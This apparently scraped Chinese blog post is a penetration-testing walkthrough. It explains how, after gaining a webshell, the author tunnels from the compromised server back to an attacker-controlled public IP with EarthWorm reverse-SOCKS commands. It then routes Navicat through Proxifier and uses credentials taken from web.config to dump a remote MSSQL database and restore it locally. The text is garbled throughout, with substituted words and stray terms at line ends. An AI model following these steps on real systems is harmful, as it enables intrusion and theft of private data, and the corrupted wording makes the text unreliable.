使用ew代理导出和导入mssql数据
最近有些忙,在51cto上了一个《Web网站安全评估分析及防护》专栏,说实话,针对attack的状况,如何来进行扫描,如何来进行防护,如何发现漏洞,是一件颇有意思的事情,作这个事情才有意义和价值,penetest仅仅是为了证实,经过技术手段,能够验证,可以拿到webshell,乃至服务器权限。在前端时间的一个penetest中,因为Web服务器是站库分离,经过webshell来导出数据比较困难(MSSQL数据库),即便导出数据库,数据库在内网数据库服务器上,没法直接下载,经过研究和实战,经过ew代理及Navicat for SQL Server工具,成功获取目标数据库中的数据,没有太多技术含量,文章比较实用,可以解决实际问题。下面是详细过程:前端
在penetest过程当中碰到一些状况,仅仅获取了webshell权限,没法提权(阿里云服务器),而数据库服务器又不在本地,数据库服务器在阿里云上,仅仅受权webshell所在IP的计算机访问,这时候就须要经过架设代理,经过代理链接数据库服务器,并经过Navicat for SQL Server将数据库从远端取回,同时须要在本地进行还原。web
设置代理
1.在独立公网IP执行命令
下载ew代理工具,下载地址:http://rootkiter.com/EarthWorm/ ,解压后将对应版本的ew复制到相应文件夹,执行命令:ew -s rcsocks -l 1080 -e 8888,如图1所示,其中8888为独立公网IP地址所开放的8888端口,1080为代理端口。sql
图1在独立公网服务器上开启443代理shell
2.在被控制服务器上执行命令
将ew.exe复制到被控制服务器上,经过shell执行命令:ew -s rssocks -d 139.1..31 -e 8888,139.1..31为独立IP地址,链接8888端口。数据库
3.设置Proxifier
安装Proxifier程序,安装完毕后,单击“配置文件”-“代理服务器”-“添加”,在地址中填写公网IP地址和对应的端口,如图2所示,协议选择socks版本5,完成后肯定设置。安全
图2设置Proxifier代理IP地址服务器
4.测试代理
在视图中单击“代理检查器”,如图3所示,单击“开始测试”,若是代理服务器可以正常连通,则显示绿色,不然显示红色表示代理通道未成功链接。ide
图3测试代理通道创建函数
设置Navicat for SQL Server
1.设置Navicat for SQL Server链接
安装Navicat for SQL Server,完成后,打开Navicat for SQL Server,在其中新建一个数据库链接,如图4所示,在主机名或IP地址中填写对应的地址,通常选择SQL Server验证,在用户名和密码中输入获取的用户名和密码(数据库用户名和密码通常在链接字符串中,例如web.config)。工具
图4设置Navicat for SQL Server链接
2.链接测试
在Navicat for SQL Server中双击database,如图5所示,打开该数据库服务器中的全部数据库,选中一个数据库打开之dbo。
图5测试数据库链接
导出数据库
1.选择和设置数据库导出
选中数据库名称(例如datadb)-dbo,右键单击选择“数据传输”,在常规中会自动出现刚才选中的数据库,默认会选择全部的表、视图、过程和函数,在目标中选择“文件”-选择导出文件的位置和名称,编码选择默认,如图6所示。
图6设置数据库导出
2.去掉删除数据库表选项
在高级中须要去掉“建立前删除目标对象”选项框,若是本地存在该数据库,则不用去掉。如图7所示,若是没有去掉,则会在导入数据库是出错,由于须要drop表,数据库自己不存在!其它选项能够根据实际须要进行选择。
图7去掉删除表操做
3.导出数据
如图8所示,正确设置数据库导出属性后,开始导出数据库,显示100%数据传输时表明该数据库数据和表所有导出到本地sql文件。
图8导出数据库sql文件
导入SQL Server数据库
将导出的SQL文件下载到本地,本地须要搭建SQL Server数据库服务器,其导入过程比较简单,下面介绍其操做流程,详细过程就不赘述了。
1.在本地SQL Server数据库中建立对应的数据库名称
2.设置相同的用户,此处设置导出是数据对应的用户名称和密码,跟导出的sql文件对应的用户和权限,防止出现权限不一致导入数据失败。
3.设置用户的对应权限。在SQL Server中对用户设置能够访问数据库以及数据库角色权限。
4.设置Navicat for SQL Server,用一样的方法在本地创建数据库链接。
5.链接数据库服务器,打开须要导入的数据库到dbo处,选择运行SQL文件,选中导出的sql文件,开始导入数据库。
6.数据库导入成功后,刷新数据库便可在本地使用。
以为本文不错的朋友,能够移步本人在51cto专栏文章,订阅专栏双重好礼:500g安全类电子资源包&51CTO送书活动
(1)《Web网站安全评估分析及防护》
(2)《sqlmap从入门到精通》
- 1. mssql数据库单表导入、导出
- 2. BCP导入导出MsSql
- 3. MSSQL导入/导出教程
- 4. 如何利用Navicat导入/导出mssql中的数据
- 5. MsSql数据导入MySql
- 6. 数据库表数据的导出和用户导入导出
- 7. ORACLE使用DBLINK导入导出数据
- 8. 使用Toad导入导出dmp数据
- 9. 使用BCP导出导入数据
- 10. 使用PLSQL导入导出数据库
- 更多相关文章...
- • ionic 导航 - ionic 教程
- • jQuery Mobile 导航栏 - jQuery Mobile 教程
- • TiDB 在摩拜单车在线数据业务的应用和实践
- • Java Agent入门实战(三)-JVM Attach原理与使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 在windows下的虚拟机中,安装华为电脑的deepin操作系统
- 2. 强烈推荐款下载不限速解析神器
- 3. 【区块链技术】孙宇晨:区块链技术带来金融服务的信任变革
- 4. 搜索引起的链接分析-计算网页的重要性
- 5. TiDB x 微众银行 | 耗时降低 58%,分布式架构助力实现普惠金融
- 6. 《数字孪生体技术白皮书》重磅发布(附完整版下载)
- 7. 双十一“避坑”指南:区块链电子合同为电商交易保驾护航!
- 8. 区块链产业,怎样“链”住未来?
- 9. OpenglRipper使用教程
- 10. springcloud请求一次好用一次不好用zuul Name or service not known
- 1. mssql数据库单表导入、导出
- 2. BCP导入导出MsSql
- 3. MSSQL导入/导出教程
- 4. 如何利用Navicat导入/导出mssql中的数据
- 5. MsSql数据导入MySql
- 6. 数据库表数据的导出和用户导入导出
- 7. ORACLE使用DBLINK导入导出数据
- 8. 使用Toad导入导出dmp数据
- 9. 使用BCP导出导入数据
- 10. 使用PLSQL导入导出数据库